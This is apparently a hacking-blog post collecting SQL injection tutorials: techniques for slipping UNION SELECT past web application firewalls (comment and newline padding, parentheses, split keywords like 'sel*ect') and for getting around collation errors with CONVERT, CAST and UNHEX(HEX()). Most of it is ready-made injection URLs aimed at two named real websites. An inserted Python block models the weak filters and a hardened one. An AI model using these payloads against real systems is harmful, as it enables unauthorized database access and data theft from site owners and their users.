SQL injection Bypass WAF

1. Using /**/ or %0A instead of whitespace. MySQL treats an inline comment and a newline exactly like a space, so the query still parses, while a filter that looks for the literal string "union select" never sees it.

So instead of

Code:
union select 1,2,3,4,5

we use

Code:
/**/union/**/select/**/1,2,3,4,5

or

Code:
%0Aunion%0Aselect%0A1,2,3,4,5

2. Using parentheses. MySQL accepts parentheses around the subquery and around each selected expression, so the keywords can be separated by ( instead of by a space.

Instead of

Code:
union select 1,2,3,4,5

we use

Code:
union(select(1),(2),(3),(4),(5))

or

Code:
union(select(1),2,3,4,5)

Hello guys,
here is part 2 finally.

The WAF bypass was worked out by
ajkaro (HF member);
my greetings to him.

I will just write it up as a tutorial.

Let's start.
Here is the vulnerable site we will use:

Code:
http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=117

Code:
http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117 UNION SELECT 1,2,3,4,5,6,7,8,9--

No vulnerable column shows up.

[Image: f79d150bae354d151813360a601b0878.png]

Let's try to bypass the WAF:

Code:
http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117+union /*!select*/ 1,2,3,4,version(),6,7,8,9--+
Same result. Let's use another bypass.
[Image: 5fe6b5cf97820f156cfd9877ae998f06.png]
Now the solution!

This time we notice that, besides the select keyword, all * characters are missing as well: every * was cut out by the WAF. That also explains why the /*!select*/ version comment failed, since both its select and its asterisks were removed.

Now some logic. If the select keyword is filtered out, we mask it so the WAF does not detect it, and we attack the WAF with its own weapon, the * character. The filter removes each forbidden token only once and does not re-scan its own output, so what remains after the removal is a valid select.

Here is the solution:

Code:
http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117+union sel*ect 1,2,3,4,version(),6,7,8,9--+

OR

Code:
http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117+union SELselectECT 1,2,3,4,version(),6,7,8,9--+
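The filter logic behind both parts above, as an added Python example that is not part of the original post or of ajkaro's method: two models of the weak WAF behaviour the tutorial exploits (a literal "union select" blocklist for part 1, a strip-once filter for part 2), a normalization step that approximates what the MySQL lexer sees, and a hardened variant that normalizes before matching and rejects instead of sanitizing. The payloads, the WAF functions and the normalization rules are constructed for illustration and are not the target site's real filter.

```python
import re
from urllib.parse import unquote_plus

# Constructed payloads (values of the id parameter only), modelled on the
# tutorial's requests. Hypothetical: not the original page's requests verbatim.
PAYLOADS = {
    "plain":       "-117 union select 1,2,3,version()",
    "comments":    "-117/**/union/**/select/**/1,2,3,version()",
    "newlines":    "-117%0Aunion%0Aselect%0A1,2,3,version()",
    "parens":      "-117 union(select(1),2,3,version())",
    "version_cmt": "-117 union /*!select*/ 1,2,3,version()",
    "star":        "-117 union sel*ect 1,2,3,version()",
    "nested":      "-117 union SELselectECT 1,2,3,version()",
}


def blocklist_waf(raw):
    """Weak WAF no. 1 (part 1 of the tutorial): URL-decode once and reject only
    the literal phrase 'union select'. Returns None when the request is blocked."""
    q = unquote_plus(raw)
    return None if "union select" in q.lower() else q


def strip_waf(raw):
    """Weak WAF no. 2 (the behaviour observed in part 2): delete the word 'select'
    and every '*' in one pass, then forward whatever is left to the database."""
    q = unquote_plus(raw)
    q = re.sub(r"select", "", q, flags=re.IGNORECASE)  # single pass, no re-scan
    return q.replace("*", "")


def normalize(raw):
    """Approximate what the MySQL lexer sees: URL-decode to a fixpoint,
    execute /*!...*/ version comments, treat ordinary /*...*/ comments as
    whitespace, and collapse whitespace runs (newlines included)."""
    q, prev = raw, None
    while q != prev:
        prev, q = q, unquote_plus(q)
    q = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", q, flags=re.DOTALL)
    q = re.sub(r"/\*.*?\*/", " ", q, flags=re.DOTALL)
    return re.sub(r"\s+", " ", q).strip()


UNION_SELECT = re.compile(r"\bunion\b[\s(]*\bselect\b", re.IGNORECASE)


def hardened_waf(raw):
    """Normalize first, match on tokens rather than on literal spacing, and
    reject instead of sanitizing: nothing is removed, so there is nothing for
    a split keyword to reassemble into. Returns None when blocked."""
    return None if UNION_SELECT.search(normalize(raw)) else raw


def reaches_database(waf, raw):
    """Run a payload through a WAF and return the query text MySQL would parse,
    or None if the WAF blocked it."""
    forwarded = waf(raw)
    return None if forwarded is None else normalize(forwarded)


if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(f"{name:12} blocklist={reaches_database(blocklist_waf, payload)!r}")
        print(f"{'':12} strip    ={reaches_database(strip_waf, payload)!r}")
        print(f"{'':12} hardened ={reaches_database(hardened_waf, payload)!r}")
```

The comment, newline, parenthesis and /*!select*/ payloads all sail past the blocklist and arrive at the database as a plain union select; the sel*ect and SELselectECT payloads are only valid SQL after the strip-once filter has rewritten them, which is why the hardened variant (which never rewrites) can let them through as harmless syntax errors while still blocking every real union select. A WAF of this kind is a detection layer only; the fix for the underlying bug is a parameterized query.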

Today I am going to show you how to bypass the "Illegal mix of collations" error in SQLi.

There are a few ways to do it.

Let's take an example:

Code:
http://www.andytimmons.com/video.php?id=0004 and 0 UNION SELECT 1,version(),3,4,5,6,7,8--

[Image: b1632ec7b6b07915ca6d868f38d00af2.jpg]
1. Specify a COLLATE clause
SELECT * FROM table ORDER BY somekey COLLATE latin1_general_ci;

In an injected query the clause goes on the expression whose collation clashes with the column in the original SELECT. The collation must belong to that expression's character set; otherwise MySQL raises a different error ("COLLATION '...' is not valid for CHARACTER SET '...'").

Some collation names we can use:
latin1_general_ci
utf8_general_ci
utf8_unicode_ci
latin1_german1_ci
latin1_swedish_ci
...
A name ending in _ci indicates a case-insensitive collation.
A name ending in _cs indicates a case-sensitive collation.
A name ending in _bin indicates a binary collation. Character comparisons are based on character binary code values.

2. Use function CONVERT
CONVERT() provides a way to convert data between different character sets. The syntax is:

CONVERT(expr USING transcoding_name)

Example:

Code:
http://www.andytimmons.com/video.php?id=0004 and 0 UNION SELECT 1,convert(version() using binary),3,4,5,6,7,8--

3. Use function CAST
You may also use CAST() to convert a string to a different character set. The syntax is:

CAST(character_string AS character_data_type CHARACTER SET charset_name)

Example:

Code:
http://www.andytimmons.com/video.php?id=0004 and 0 UNION SELECT 1,cast(version() as binary),3,4,5,6,7,8--

4. Use the functions UNHEX(HEX(xx))
HEX() --> returns a hexadecimal string representation of a number or string value
UNHEX() --> interprets its argument as pairs of hexadecimal digits and returns the corresponding binary string

The round trip keeps the bytes of version() but returns them as a binary string, so, like the CONVERT and CAST variants above, the injected column no longer carries a text collation that can clash with the original query.

Example:

Code:
http://www.andytimmons.com/video.php?id=0004 and 0 UNION SELECT 1,UNHEX(HEX(version())),3,4,5,6,7,8--

Note:

When copying, cite the source: Hacking Security
 

Copyright © 123 H4ck' Blog. Powered by Blogger